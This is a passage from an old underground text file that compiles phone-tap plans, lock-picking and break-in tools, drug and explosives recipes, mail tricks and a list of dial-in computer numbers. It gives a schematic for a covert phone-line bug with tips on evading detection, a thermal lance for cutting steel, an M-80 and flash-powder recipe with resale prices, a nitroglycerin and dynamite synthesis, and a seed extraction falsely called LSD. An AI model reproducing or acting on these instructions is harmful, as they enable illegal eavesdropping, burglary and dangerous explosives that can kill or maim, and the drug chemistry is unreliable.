  2843.                       PART IV: WIRELESS TRANSMITTER PLANZ
  2844.  
  2845. This is a tiny transmitter that consists on a one colpitts oscillator that
  2846. derives it's power from the phone line. Since the resistance it puts on the
  2847. line is less than 100 ohms, it has no effect on the telephone performance, and
  2848. can not be detected by the phone company, or the tappee. Since it is a
  2849. low-powered device using no antenna for radiation, it is legal to the FCC.
  2850. (That is it complies with part 15 of the FCC rules and regulations). It,
  2851. however is still illegal to do, it's just that what you're using to do it is
  2852. legal. This is explained later in part 15... "no person shall use such a device
  2853. for eavesdropping unless authorized by all parties of the conversation" (then
  2854. it's not eavesdropping is it?). What this thing does, is use four diodes to
  2855. form a "bridge rectifier". It produces a varying dc voltage varying with the
  2856. auto-signals on the line. That voltage is used to supply the the voltage for
  2857. the oscillator transistor. Which is connected to a radio circuit. From there,
  2858. you can tune it to any channel you want. The rest will all be explained in a
  2859. minute....
  2860.  
  2861.  
  2862.  
  2863.  
  2864.   ∩7Å3 èPARTS LIST
  2865. item                              description
  2866. -----------------------------------------------------------------
  2867. C1                   47-Pf ceramic disk capacitor
  2868. C2,C3                27-Pf mica capacitor
  2869. CR1,CR2,CR3,CR4      germanium diode 1n90 or equivalent
  2870. R1                   100 ohm, 1/4 watt 10% composition resistor
  2871. R2                   10k, 1/4 watt 10% composition resistor
  2872. R3                   .7k, 1/4 watt 10% composition resistor
  2873. L1                   2 uH radio frequency choke (see text)
  2874. L2                   5 turns No.20 wire (see text)
  2875. Q1                   Npn rf transistor 2N5179 or equivalent
  2876. -----------------------------------------------------------------
  2877.  
  2878. L1 may be constructed by winding approximately 40 turns of No. 36
  2879. enamel wire on a mega-ohm, 1/2 watt resistor. The value of L1 is
  2880. not critical. L2 can be made by wrapping 5 turns of No. 20 wire
  2881. around a 1/4 inch form. After the wire is wrapped, the form can
  2882. be removed. Just solder it into place on the circuit board. It
  2883. should hold quite nicely. Also be sure to position Q1 so that the
  2884. emitter, base, and collector are in the proper holes. The
  2885. schematic should be pretty easy to follow. Although it has an
  2886. unusual number of grounds, it still works.
  2887.  
  2888.  
  2889.  
  2890.  
  2891.                   ------------------L1----------------
  2892.                  --
  2893.             CR1 /  \ CR2              ----------------
  2894. A--------------/    \ --         ----
  2895.               \    /                         C2    L2
  2896.            CR3 \  /CR4          C1  R2    ----
  2897.       R1         --                     gnd   C3
  2898.                                ----          -----
  2899.                gnd
  2900.                                     ---------Base  collector
  2901.                                           R3     \   /
  2902. B-----------------------                          \/\ <- Q1
  2903.                                            gnd       \/
  2904.  
  2905.  
  2906.                                                     emitter(gnd)
  2907.  
  2908.  
  2909.  
  2910. The odd thing about this bug that we haven't encountered yet, is that it is put
  2911. on only one wire (either red or green) so go to the box, remove the red wire
  2912. that was ALREADY on screw #1 and attach it to wire 'A' of the bug. Then attach
  2913. wire 'B' to the screw itself. You can adjust the frequency which it comes out
  2914. on the FM channel by either smooshing, or widening the coils of L2. It takes a
  2915. few minutes to get to work right, but it is also very versatile. You can change
  2916. the frequency at will, and you can easily record off your radio.
  2917.  
  2918.                            PART FIVE: HELPFUL HINTS  ∩7Å3 è
  2919.  
  2920. First of all, With method one, the beige box, you may notice that you can also
  2921. dial out on the phone you use. I don't recommend that you do this. If you
  2922. decide to anyway, and do something conspicuous like set up a 30 person
  2923. conference for three hours, then I suggest that you make sure the people are
  2924. either out of town or dead. In general, when you tap a line, you must be
  2925. careful. I test everything I make on my line first, then install it late at
  2926. night. I would not recommend that you leave a recorder on all day. Put it on
  2927. when you want it going, and take it off when you're done. As far as recording
  2928. goes, I think that if there is a recorder on the line it sends a sporadic beep
  2929. back to the phone co. I know that if you don't record directly off the line
  2930. (i.e off your radio) then even the most sophisticated equipment can't tell that
  2931. you're recording. Also, make sure that when you install something, the people
  2932. are NOT on the line. Installation tends to make lots of scratchy sounds, clicks
  2933. and static. It is generally a good thing to avoid. It doesn't take too much
  2934. intelligence to just make a call to the house before you go to install the
  2935. thing. If it's busy then wait a while. (This of course does not apply if you
  2936. are making a "midnight run").
  2937.  
  2938. All in all, if you use common sense, and are *VERY* careful, chances are you
  2939. won't get caught. Never think that you're unstoppable, and don't broadcast what
  2940. you're doing. Keep it to yourself, and you can have a great time.
  2941.  
  2942.  
  2943.  
  2944.  
  2945.                              Miracle Lock Picking
  2946.  
  2947.      While the basic themes of lockpicking and uninvited entry have not
  2948. changed too much in the last few years, some modern devices and techniques
  2949. HAVE appeared on the scene...
  2950.  
  2951. AUTOS
  2952.      Many older autos can still be opened by easily with a SLIM JIM type
  2953. opener (these and other auto locksmithing techniques are covered fully in the
  2954. book, IN THE STEAL OF THE NIGHT.  Look for it at the next gun-show in your
  2955. town.); however, many modern cars have built covers over the lock mechanism,
  2956. or have moved the goodies so the Slim Jim will not function...
  2957.  
  2958. So...
  2959.  
  2960. AMERICAN LOCKSMITH SERVICE
  2961. P.O. Box 26
  2962. Culver City, CA 90230
  2963.  
  2964. Carries a new and improved Slim Jim that is 30" long and only 3/4" wide so it
  2965. will both reach and slip through the new car lock covers.  Price is $5.75 plus
  2966. $2.00 postage and handling.
  2967.     General Motors cars have always been a bane to people who needed to open
  2968. them, because the sidebar locking unit they employ is very difficult to pick.
  2969. To further complicate matters, the new GM cars do employ metal shields to make
  2970. the use of a Slim Jim type instrument very difficult...
  2971.  
  2972. So...  ∩7Å3 è
  2973. LOCK TECHNOLOGY CORP.
  2974. 685 Main St.
  2975. New Rochelle, NY 10801
  2976.  
  2977. Offers a cute little gizmo which will easily remove the lock cylinder without
  2978. harm and let you enter and/or start the vehicle.  GMC-40 sells for $56.00 plus
  2979. $2.00 postage and handling.  The best general automobile opening kit is
  2980. probably the set of lockout tools offered by:
  2981.  
  2982. STECK MFG COPR.
  2983. 1319 W Stewart St.
  2984. Dayton, OH 45408
  2985.  
  2986. For $29.95 one can purchase a complete set of 6 carbon steel lockout tools
  2987. that will open 95%+ of the cars around.
  2988.  
  2989.      Kwikset locks have become quite popular as one-step-up security locks for
  2990. buildings.  They are a bit harder to pick and do offer a higher degree of
  2991. privacy than a normal, builder installed, door lock.
  2992.  
  2993. So...
  2994.  
  2995. Kwikset locks can be handily disassembled and the door opened, without harm to
  2996. either the lock or the door, by using a KIWK-OUT tool sold by:
  2997.  
  2998. A MFG
  2999. 1151 Wallace SE
  3000. Massilon, OH 44646
  3001.  
  3002. Price is $11.95, but if you are too lazy to pick auto locks...
  3003.  
  3004. VEEHOF SUPPLY
  3005. Box 361
  3006. Storm Lake, IO 50588
  3007.  
  3008. Still sells tryout keys for most cars.  Price averages about $20.00 a set.
  3009.  
  3010.  
  3011. Updated Lock Picking:
  3012.  
  3013.      For years, there have been a number of pick attack procedures for most
  3014. pin and disc tumbler lock systems.  In reverse order of ease they are:
  3015.  
  3016. Normal picking:  Using a pick set to align the pins, one by one, until the
  3017. shear line is set and lock opens.
  3018.  
  3019. Raking:  This method uses picks that are constructed wth a series of bumps, or
  3020. diamond shaped notches.  these picks are "raked", i.e., run over all pins at
  3021. one time.  With luck, the pins will raise into the open position and stay
  3022. there.  Raking, if successful, can be much less effort than standard picking
  3023. is.
  3024.  
  3025. Lock Aid Gun:  This gun shaped device was invented a number of years ago and
  3026. has found applicatin with many locksmiths and security personnel.  Basically,  ∩7Å3 èa needle shaped pick is inserted in the snout of the "gun" and the "trigger"
  3027. is pulled.  This action snaps the pick up and down strongly.  If the tip is
  3028. slipped under the pins, they will also be snapped up and down strongly.  With
  3029. a bit of luck, they will strike each other and separate at the shear line for
  3030. a split second.  When this happens the lock will open.  The Lock Aid gun is
  3031. not 100% successful, but when it does work, the results are quite dramatic.  I
  3032. have opened locks with one snap of the trigger, impressing the hell out of
  3033. casual bystanders....
  3034.  
  3035. Vibrator:  Some crafty people have mounted a needle pick onto an electric
  3036. toothbrush power unit.  This vibrating effect will sometimes open pin tumbler
  3037. locks;  like instantly...
  3038.  
  3039.  
  3040. Technology to the rescue!
  3041.  
  3042.      There is now another method to open pin and wafer locks in a very short
  3043. time.  Although it resembles the toothbrush pick in appearance, it is actually
  3044. and electronic device.  I am speaking of the COBRA PICK.  Designed and sold
  3045. by:
  3046.  
  3047. FEDCORP
  3048. P.O. Box 569
  3049. Scottsdale, AZ 85252
  3050.  
  3051. The Cobra uses two 9-volt batteries, teflon bearings (for less noise) and a
  3052. cam-roller.  It comes with three picks (for different types of locks) and
  3053. works both in America and overseas on pin or wafer locks.  It will open common
  3054. door type locks in 3 to 7 seconds with no damage (in the hands of an
  3055. experienced locksmith).  It can take a few seconds more, or even half a minute
  3056. in the hands of someone with no experience.  How much for this toy that will
  3057. open most locks in 7 seconds?
  3058.  
  3059. $235 plus $4.50 handling.
  3060.  
  3061.  
  3062.     If none of these cute, safe and sane ideas appeal to you, you can always
  3063. fall back on the magic thermal lance...
  3064.  
  3065.  
  3066.     The thermal lance is a rather crude instrument constructed from 3/8"
  3067. hollow magnesium rods.  Each "tube" comes in a 10" length, but can be cut down
  3068. if desired.  Each one is threaded on one end.  To use the lance, you screw the
  3069. tube together with a mated regulator (like a welding outfit uses) and hook up
  3070. an oxygen tank.  the oxygen is turned on and the hollwo rod is lit with a
  3071. welding igniter.  The device produces an incredible amount of heat.  It is
  3072. used for cutting up concrete blocks or even rocks.  An active lance will go
  3073. through a foot of steel in a few seconds.
  3074.  
  3075. The lance, also known as a burning bar, is available from:
  3076.  
  3077. C.O.L. MFG
  3078. 7748 W Addison
  3079. Chicago, IL 60634
  3080.   ∩7Å3 è
  3081.                              ====================
  3082.                              =    MAKING LSD    =
  3083.                              ====================
  3084. LSD, being of the strangest drugs, is available to people on the black
  3085. market, is not too hard to make in your average run-of-the-mill kitchen.
  3086. LSD (LySergic acid Diethylamide) is a complex organic mixture that gives
  3087. some people (most)
  3088. ================================
  3089. Making LSD: ITEMS NEEDED:
  3090.   1-About 200-250 grams of MORNIGLOR SEEDS or BAY HAWAIIAN OOD ROSE SEEDS.
  3091.    The Morning Glory Seeds can be obtained at most plant nurseries.
  3092.   2-200 cc. of petroleum ether
  3093.   3-Small piece of window screen or a strainer.
  3094.   4-A couple of large glasses.
  3095.   5-One cookie try (old on to never be used again).
  3096.   6-260 cc. of wood alcohol (call your local drug store).
  3097.   7-Capsule containers (jel)
  3098. ================================
  3099. Lets get started:
  3100.   1.  Grind up about 170 grams of Morning Glory Seeds.
  3101.   2.  In 145 cc of petroleum ether, soak the seeds for two or three days.
  3102.   3.  With screen, filter the liquid thru it and save the seed mush and allow
  3103.    it to dry completely.
  3104.   4.  Let the mush soak in 130 cc. of wood alcohol.
  3105.   5.  Filter solution again only.  Save the liquid in a large glass jar.
  3106.   6.  Soak the seed mush again in 130 cc. of wood alcohol for two more days.
  3107.   7.  Filter out the mush and keep the liquid.  Now, get the liquid that was
  3108.    saved in step 5.
  3109.   8.  Now, pour both liquids in a cookie tray and let it dry.
  3110.   9.  When all the liquid has dried, a yellowish gummy looking substance will
  3111.    appear on the cookie sheet.
  3112.   10. Take the yellow gum and put these in to capsules.
  3113. ================================
  3114. You can get the capsules just by buying something like DEXITREM or some other
  3115. pill.  Even CONTACT comes in jel capsules.  Just empty them out and
  3116. put the yellow gum in the capsules.  Allow the capsules to sit over night
  3117. for best results.
  3118.  
  3119. 1 Trip:
  3120.   34 Grams of morning glory
  3121.   18 Grams of hawaiian wood
  3122. ================================
  3123.  
  3124.  
  3125.                        How to open your own M-80 Factory
  3126.  
  3127.  
  3128.                                   **********
  3129.                                   *Supplies*
  3130.                                   **********
  3131.  
  3132. Chicago Paper Tube. Phone # 1-312-666-1404. You will be getting the paper
  3133. tubes from here. Order tubes that are 1/2" in diameter by 1 1/2" long with a
  3134. 1/16" wall with RED outer wrap.  ∩7Å3 è
  3135. Paper Products. 1310 5th St., Tempe, AZ. 85281. Order 1/2" diameter paper end
  3136. plugs. Write to them for prices. REMEMBER:  for every 100 paper tubes you
  3137. order, you must order 200 paper end plugs.
  3138.  
  3139. Midwest Fireworks. 8550 RT. 224,Deerfield,OH. 44411.  Phone 1-800-321-2400.
  3140. Order one roll of 1/8" water proof fuse. Each M-80 needs a 2" fuse, so for
  3141. every 100 paper tubes you order, you should have 17' of water proof fuse.
  3142.  
  3143. Barium Chemicals Inc.,P.O. Box 218,County Rd. 44, Steubenville, OH. 43952.
  3144. Phone 1-614-282-9776.  Order Potassium Perchlorate. Order 2 pounds for every
  3145. 250 paper tubes you order.
  3146.  
  3147. Alcan Metal Powder Div.,P.O. Box 290, Elizabeth,NJ 07207. Phone 1-201-353-
  3148. 4600.  Order #AL-105 Aluminum Powder. Order 1 pound for every 250 paper tubes
  3149. you order.
  3150.  
  3151. Buy 1 gallon of Elmers glue from a hardware store or lumber yard.
  3152.  
  3153.                                   **********
  3154.                                   *Assembly*
  3155.                                   **********
  3156.  
  3157. 1.  Put 1 drop of glue on the inside of one end of the tube and insert the
  3158. paper end plug.
  3159.  
  3160. 2.  Punch or drill a 1/8" hole in the side of the paper tube.
  3161.  
  3162. 3.  Cut the fuse you purchased into 2" long pieces.
  3163.  
  3164. 4.  Insert the fuse into the hole in the paper tube and glue in place.
  3165.  
  3166. 5.  Scoop the paper tube with the fuse into a container of flash powder. The
  3167. paper tube should be about 2/3 full.
  3168.  
  3169. 6.  Put glue on the end plug and insert it into the paper tube filled with
  3170. flash powder.
  3171.  
  3172. 7.  The completed M-80 firecracker should dry and the glue will become hard in
  3173. 30-45 minutes.
  3174.  
  3175.                             **********************
  3176.                             *Flash Powder Formula*
  3177.                             **********************
  3178.  
  3179. Sensitive to friction and impact. High Explosive!
  3180.  
  3181. Potassium Perchlorate     2 lbs.
  3182. Aluminum Powder           1 lb.
  3183.  
  3184. There must be a 2 to 1 ratio of Potassium Perchlorate to Aluminum Powder in
  3185. order for the flash powder to be good. It must also be mixed well.
  3186.  
  3187. Suggested Price for the M-80's
  3188. You can make up your own price,but here are some prices.  ∩7Å3 è
  3189. 2 for $1.00   11 for $5.00   24 for $10.00   50 for $20.00   100 for $40.00
  3190.  
  3191.  
  3192.  
  3193.  
  3194.                                   ============
  3195.                                   MAIL SECRETS
  3196.                                   ============
  3197.  
  3198.   There is a little secret coding or gimmickry on U.S. mail.  All U.S. postage
  3199. stamps have an invisible ink coding that flouresces in ultraviolet light.
  3200. Partly this is to detere counterfeiting of stamps.  Mostly, it is to speed up
  3201. sorting.  Canceling machines shine an ultraviolet beam on letters and check for
  3202. a glow.  Calcium silicate (which glows orange-red) and zinc orthosilicate
  3203. (which glows yellow-green) are used.  They are printed over the entire surface
  3204. of stamps or in a geometric pattern.
  3205.  
  3206.   Personal letters to the U.S. President have a secret numerical code.  The
  3207. president often gets 10,000 letters a day.  Virtually all must be opened, read,
  3208. and answered by the White House mail staff.  So that letters from friends get
  3209. to the president and family unopened, all close friends are given a sequence of
  3210. numbers to write on the outside of the envelope.  The code changes with each
  3211. president.  Ronald Reagan's code was described as a number with a special
  3212. meaning to Reagan and his wife.  Jimmy Carter used an old phone number of
  3213. Rosalynn's.
  3214.  
  3215. ---------
  3216. WAX SEALS
  3217. ---------
  3218.  
  3219.   Wax seals are not a guarantee against unauthorized opening of a letter.
  3220. According to the CIA Flaps and Seals Manual, edited by John M. Harrison
  3221. (Boulder, Colo.:  Paladin Press, 1975), there is a way to remove and replace
  3222. seals.
  3223.  
  3224.   First the opener takes a plaster-of-paris cast of the seal.  This is set
  3225. aside to harden.  The wax is gently heated with an infrared lamp.  When soft,
  3226. it is rolled into a ball and set aside.  The flap of the envelope is steamed
  3227. open, and the letter is taken outand photocopied.
  3228.  
  3229.   After the envelope's contents and replaced and the flap resealed, the same
  3230. wax is used to re-create the seal.  It is heated till pliable and pressed back
  3231. into shape with the plaster-of-paris mold.
  3232.  
  3233.   One type of seal is secure, even according to CIA Flaps And Seals Manual:
  3234. one made of two or more colors of wax melted together.  The colors inevitably
  3235. come out different on the second, surreptitious pressing.  But a color Polaroid
  3236. of the seal must be sent under seperate cover so that the letter's recipient
  3237. can compare it wiht the seal on the message letter.
  3238.  
  3239.   None of the common seals are reliable against unauthorized opening, assuming
  3240. that knowledgeable letter-openers may want to open your mail.  Scoth tape
  3241. across the flap of an envelpoe come of cleany with carbon tetrachloride
  3242. (applied with a brush or a hypodermic needle).  If you suspect that someone is  ∩7Å3 èopening your mail, the manual suggests sending yourself a letter containing a
  3243. sheet of carbon or wax paper.  The heat and mechanical treatment of the letter
  3244. opening will smudge the carbon and melt the wax.  Otherwise, you have to
  3245. examine letters carefully to detect prior opening.  A torn flap, smudging of
  3246. the flap glue, flattened ridges in the flap, or concave (from the back) curling
  3247. due to steaming are evidence of opening.
  3248.  
  3249.   A more sophisticated test requires steaming part of the envelope near the
  3250. flap for fifteen seconds.  Then place the envelope under an ultraviolet lamp.
  3251. If there is a difference in flourescence between the steamed and the unsteamed
  3252. part of the envelope, then the envelope paper is suitable for the test.  If so,
  3253. examine the unsteamed part of the flap under the ultraviolet lamp.  If it shows
  3254. a different flourescence than the other unsteamed parts of the envelope, it
  3255. indicates that the flap may have been previously steamed.
  3256.  
  3257.   The ultraviolet lamp is also useful in detecting invisible writing.  An
  3258. effective ultraviolet ink need not flouresce brightly, as the silicate stamps
  3259. inks do.  Any substance that changes the flourescence of paper in ultraviolet
  3260. light yet is invisible in ordinary light will work.  Prisoners have used human
  3261. urine as an invisible ink (not hard to get, ehh?).  Salt water, vinegar, milk,
  3262. fruit juices, saliva, and water solutions of soap or drugs also work, with
  3263. varying degrees of legibility.
  3264.  
  3265.  
  3266. ---------------------------
  3267. HOW TO MAIL WITHOUT A STAMP
  3268. ---------------------------
  3269.  
  3270.   Postal chiselers used to mail letters unstamped in the knowledge that they
  3271. would be delievered anyway--postage due to the recipient.  It took a niggardly
  3272. person to mail personal letters this way, but many people did it on bill
  3273. payments.  So the post office changed its policy.  It stopped delivering
  3274. letters without stamps.  A letter with a stamp--even a one-cent stamp--is
  3275. delivered (postage due if need be).  A letter with no stamp is returned to the
  3276. sender.
  3277.  
  3278.   Naturally, this had just opened up a new way of cheating.  Letters can now be
  3279. maileed for free by switching the positions of the delivery address and the
  3280. return address.  If there is no stamp on the envelope, it will be "returned"--
  3281. that is, delivered to the address in the upper left corner--which is where the
  3282. sender wanted it to go in the first place.  Unlike under the old system, the
  3283. letter is not postage-due.  At most the recipient gets a stamped purple
  3284. reminder that "the post office does not deliver mail without postage."
  3285.  
  3286.   At least one large company seems to have adapted this principle to its
  3287. billing.  Citibank bases its MasterCard operations in Sioux Falls, South
  3288. Dakota.  The bill payment envelopes have the Citibank Sioux Falls address in
  3289. both the delivery address and the return address positions.  (Most bill payment
  3290. envelopes have three lines for the customer to write in his return address.)
  3291. Therefore, regardless of whether the customer puts a stamp on the envelope, it
  3292. is delivered to Citibank.  (The return-address gimmick works even when the
  3293. return address is in a different state from the mailing point.)
  3294.  
  3295.   Who is cheating whom?  If the customer puts the correct postage on the
  3296. envelope, it is delivered to Sioux Falls at customer expense.  No one is  ∩7Å3 èslighted.  If, on the other hand, the customer intentionally omits the stamp,
  3297. the payment is delivered at the post office expense.  Then the customer has
  3298. cheated the post office.  The post office also loses out if the customer
  3299. honestly forgets to put a stamp on the envelope.  But the blame ought to be
  3300. shared with the peculiar design of Citibank's envelope.
  3301.  
  3302.   Citibank's motive is plain:  If payment envelopes are returned to forgetful
  3303. customers, it delays payment.
  3304.  
  3305.  
  3306.  
  3307.  
  3308.                          **** MAINFRAMES & MISC. ****
  3309.  
  3310.  
  3311.      THE FOLLOWING IS A LIST OF NUMBERS I HAVE COMPILED THROUGH A PERIOD OF
  3312. TIME. NOTE THAT SOME OF THE NUMBERS LISTED ARE NOT OF MAINFRAME NATURE BUT
  3313. RATHER A SMALLER TYPE SYSTEM.
  3314.  
  3315. 312-972-7603   ARROGON NET LAB
  3316. 800-228-1111   AMERICAN EXPRESS
  3317. 215-564-6572   ATLANTIC CITY CASINO
  3318. 800-225-8456   AUTONET
  3319. 800-327-676
  3320. 313-234-5621   FTS
  3321. 213-798-2000   FTS
  3322. 202-347-3222   F.A.A.
  3323. 817-332-8491   FORTWORTH SCHOOL
  3324. 817-625-6401   GIS
  3325. 617-732-1251   HARVARD
  3326. 617-732-1802   "
  3327. 415-857-8193   HP3000
  3328. 303-232-8555   HP3000
  3329. 313-644-3840   HIGH SCHOOL
  3330. 714-962-3365   H.A.T.S.
  3331. 215-563-9213   HP3000
  3332. 512-385-4170   HP3000
  3333. 301-881-6156   HP3000
  3334. 301-881-6157   HP3000
  3335. 301-881-6158   HP3000SION
  3336. 609-734-3131   RCA/CMS
  3337. 414-476-8010   RSTS/E
  3338. 414-542-4494   "
  3339. 414-543-0789   "
  3340. 303-447-2540   "
  3341. 817-877-0548   "
  3342. 313-964-2064   SMITH & HENCHMAN
  3343. 315-423-1313   SYRACUSE DECS
  3344. 404-885-3460   SEARS CREDIT CHECK
  3345. 212-369-5114   SPENCE SCHOOL
  3346. 713-795-1200   SHELL VULCAN
  3347. 313-964-2000   SEMAT COMPUTER
  3348. 412-794-7601   SLIPPERY ROCK OIL
  3349. 800-424-9494   TELEMAIL
  3350. 714-776-4511   TRW  ∩7Å3 è
  3351.  
  3352.      THE FOLLOWING IS A LIST OF NUMBERS I HAVE COMPILED THROUGH A PERIOD OF
  3353. TIME. NOTE THAT SOME OF THE NUMBERS LISTED ARE NOT OF MAINFRAME NATURE BUT
  3354. RATHER A SMALLER TYPE SYSTEM.
  3355.  
  3356. 312-972-7603   ARROGON NET LAB
  3357. 800-228-1111   AMERICAN EXPRESS
  3358. 215-564-6572   ATLANTIC CITY CASINO
  3359. 800-225-8456   AUTONET
  3360. 800-327-676
  3361. 313-234-5621   FTS
  3362. 213-798-2000   FTS
  3363. 202-347-3222   F.A.A.
  3364. 817-332-8491   FORTWORTH SCHOOL
  3365. 817-625-6401   GIS
  3366. 617-732-1251   HARVARD
  3367. 617-732-1802   "
  3368. 415-857-8193   HP3000
  3369. 303-232-8555   HP3000
  3370. 313-644-3840   HIGH SCHOOL
  3371. 714-962-3365   H.A.T.S.
  3372. 215-563-9213   HP3000
  3373. 512-385-4170   HP3000
  3374. 301-881-6156   HP3000
  3375. 301-881-6157   HP3000
  3376. 301-881-6158   HP3000SION
  3377. 609-734-3131   RCA/CMS
  3378. 414-476-8010   RSTS/E
  3379. 414-542-4494   "
  3380. 414-543-0789   "
  3381. 303-447-2540   "
  3382. 817-877-0548   "
  3383. 313-964-2064   SMITH & HENCHMAN
  3384. 315-423-1313   SYRACUSE DECS
  3385. 404-885-3460   SEARS CREDIT CHECK
  3386. 212-369-5114   SPENCE SCHOOL
  3387. 713-795-1200   SHELL VULCAN
  3388. 313-964-2000   SEMAT COMPUTER
  3389. 412-794-7601   SLIPPERY ROCK OIL
  3390. 800-424-9494   TELEMAIL
  3391. 714-776-4511   TRW
  3392.  
  3393.  
  3394.  
  3395.                            How to Make Nitroglycerin
  3396.  
  3397.                     CH2ONO2
  3398.                     !
  3399.   3/2 N2 + 3 CO2
  3400.                     CHONO2  ---------->
  3401.      +
  3402.                     !        Ignition
  3403.   5/2 H2O + 1/4 O2
  3404.                     CH2ONO2  ∩7Å3 è
  3405. (How Nitro explodes--note that the byproducts are nothing but nitrogen, carbon
  3406. dioxide, water and oxygen)
  3407.  
  3408.      Nitroglycerin [heretofore Nitro] is a very high-explosive. I am not sure
  3409. who invented it but he porbably didn't-- the first preson to make it blew
  3410. himself up and his friend got the info off his notes. Well anyway, the next
  3411. best thing to nitro is TNT which is ten times harder to make but also ten
  3412. times safer to make. If you can't use common sense then don't even try to make
  3413. this stuff-- a few drops can be lethal under certain circumstances.
  3414.  
  3415.                             To make Nitro:
  3416.                             --------------
  3417.  
  3418.      Mix 100 parts fuming nitric acid(for best results it should have a
  3419. specific gravity of 50 degrees Baume') with 200 parts sulphuric acid. This is
  3420. going to be hot at first--it won't splatter if you pour the nitric into the
  3421. sulphuric but don't try it the other way around. The acid solutions together
  3422. can dissolve flesh in a matter of seconds so take the proper measures for
  3423. God's sake!!! When cool, add 38 parts glycerine as slowly as possible. Let it
  3424. trickle down the sides of the container into the acids or it won't mix
  3425. thourily and the reaction could go fast--which causes heat to ignite the
  3426. stuff. Stir with a **GLASS** rod for about 15 seconds or so then **CAREFULLY**
  3427. pour it into 20 times it's **VOLUME** of water. It will visibly precipate
  3428. immediatly. There will be twice as much Nitro as you used glycerin and it is
  3429. easy to seperate. Mix it with baking soda as soon as you have seperated it--
  3430. this helps it not to go off spontainously.
  3431.  
  3432. ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
  3433.   NOTES:  Parts are by weight and the Baume' scale of specific gravity can be
  3434. found in most chem. books. You can get fuming nitric and sulfuric acid where
  3435. ever goo chemical or fertilizers are sold. It is positivly *STUPID* to make
  3436. more than 200 grams of Nitro at a time. When mixing the stuff wear goggles,
  3437. gloves, etc. When I first made the stuff I had the honor of having it go off
  3438. by itself (I added too much glycerin at a time). I was across the room at the
  3439. time, but I felt the impact-- so did the table it was on as well as the window
  3440. it was next to--they were both smashed by only 25 grams in an open bowl. Oh
  3441. yes, glycerine you can get at any pharmacy and you need an adults sigature for
  3442. the acids. Any bump can make Nitro go off if you don't add the bicarbonate of
  3443. (baking) soda-but even with that, if it gets old I wouldn't play catch with
  3444. it.
  3445.      Once you have made the Nitro and saturated it with bicarb. you can make a
  3446. really powerful explosive that won't go off by itself by simply mixing it with
  3447. as much cotton as you can add and then saturating it that with molten
  3448. parifine--just enough to make it sealed and hard. Typically use the same
  3449. amounts (by weight) of each Nitro, cotton, and parifine. This when wrapped in
  3450. newspaper, was once known as "Norbin & Ohlsson's Patent Dynamite," but that
  3451. was back in 1896.
  3452.  
  3453.  
  3454.  
  3455.  
  3456.  
  3457.  
  3458.   ∩7Å3 èModem Noise Killer (alpha version)
  3459.  
  3460. With this circuit diagram, some basic tools including a soldering iron, and
  3461. four or five components from Radio Shack, you should be able to cut the
  3462. noise/garbage that appears on your computer's screen.
  3463.  
  3464. I started this project out of frustration at using a US Robotics 2400 baud
  3465. modem and getting a fare amount of junk when connecting at that speed. Knowing
  3466. that capacitors make good noise filters, I threw this together.
  3467.  
  3468. This is very easy to build, however conditions may be different due to modem
  3469. type, amount of line noise, old or new switching equipment (Bell's equipment),
  3470. and on and on. So it may not work as well for you in every case. If it does
  3471. work, or if you've managed to tweek it to your computer/modem setup I' d like
  3472. to hear from you.
  3473.  
  3474. I'd also appreciate any of you electronic wizzards out there wanting to offer
  3475. any improvements. Let's make this work for everyone!
  3476.  
  3477. Please read this entire message and see if you understand it before you begin.
  3478.  
  3479. OK, what you' ll need from Radio Shack:
  3480.  
  3481. 1 #279-374 Modular line cord if you don't already have one. You won't need one
  3482. if your phone has a modular plug in its base. $4.95
  3483.  
  3484. 1 #279-420 Modular surface mount jack (4 or 6 conductor) $4.49
  3485.  
  3486. 1 #271-1720 Potentiometer. This is a 5k audio taper variable resistor. $1.09
  3487.  
  3488. 1 #272-1055 Capacitor. Any non-polarized 1.0 to 1.5 uf cap should do. Paper,
  3489. Mylar, or metal film caps should be used, although #272-996 may work as well.
  3490. (272-996 is a non-polarized electrolytic cap) $.79
  3491.  
  3492. 1 100 ohm resistor - quarter or half watt. $.19
  3493.  
  3494. 1 #279-357 Y-type or duplex modular connector. Don't buy this until you've read
  3495. the section on connecting the Noise Killer below. (A, B,or C) $4.95
  3496.  
  3497. First off, open the modular block. You normally just pry them open with a
  3498. screwdriver. Inside you'll find up to 6 wires. Very carefully cut out all but
  3499. the green and red wires. The ones you'll be removing should be black, yellow,
  3500. white, and blue. These wires won't be needed and may be in the way. So cut them
  3501. as close to where they enter the plug as possible. The other end of these wires
  3502. have a spade lug connector that is screwed into the plastic. Unscrew and remove
  3503. that end of the wires as well. Now, you should have two wires left. Green and
  3504. red. Solder one end of the capacitor to the green wire. Solder the other end of
  3505. the capacitor to the center lug of the potentiometer (there are three lugs on
  3506. this critter). Solder one end of the resistor to the red wire. You may want to
  3507. shorten the leads of the resistor first. Solder the other end of the resistor
  3508. to either one of the remaining outside lugs of the potentiometer. Doesn't
  3509. matter which. Now to wrap it up, make a hole in the lid of the mod block to
  3510. stick the shaft of the potentiometer through. Don't make this hole dead center
  3511. as the other parts may not fit into the body of the mod block if you do. See
  3512. how things will fit in order to find where the hole will go. Well, now that  ∩7Å3 èyou've got it built you'll need to test it. First twist the shaft on the
  3513. potentiometer until it stops. You won't know which way to turn it until later.
  3514. It doesn't matter which way now. You also need to determine where to plug the
  3515. Noise Killer onto the telephone line. It can be done by one of several ways:
  3516.  
  3517. A. If your modem has two modular plugs in back, connect the Noise Killer into
  3518. one of them using a line cord. (a line cord is a straight cord that connects a
  3519. phone to the wall outlet. Usually silver in color)
  3520.  
  3521. B. If your phone is modular, you can unplug the cord from the back of it after
  3522. you're on-line and plug the cord into the Noise Killer.
  3523.  
  3524. C. You may have to buy a Y-type modular adaptor. Plug the adaptor into a wall
  3525. outlet, plug the modem into one side and the Noise Killer into the other. Call
  3526. a BBS that has known noise problems. After you've connected and garbage begins
  3527. to appear, plug the Noise Killer into the phone line as described above. If you
  3528. have turned the shaft on the potentiometer the wrong way you'll find out now.
  3529. You may get a lot of garbage or even disconnected. If this happens, turn the
  3530. shaft the other way until it stops and try again. If you don't notice much
  3531. difference when you plug the Noise Killer in, that may be a good sign. Type in
  3532. a few commands and look for garbage characters on the screen. If there still
  3533. is, turn the shaft slowly until most of it is gone. If nothing seems to happen
  3534. at all, turn the shaft slowly from one side to the other. You should get plenty
  3535. of garbage or disconnected at some point. If you don't, reread this message to
  3536. make sure you've connected it right.
  3537.  
  3538.  
  3539. ***END OF ORIGNAL FILE***
  3540.  
  3541. ADDITION TO ORIGNAL FILE - 2/29/88 - Mike McCauley - CIS 71505,1173
  3542.  
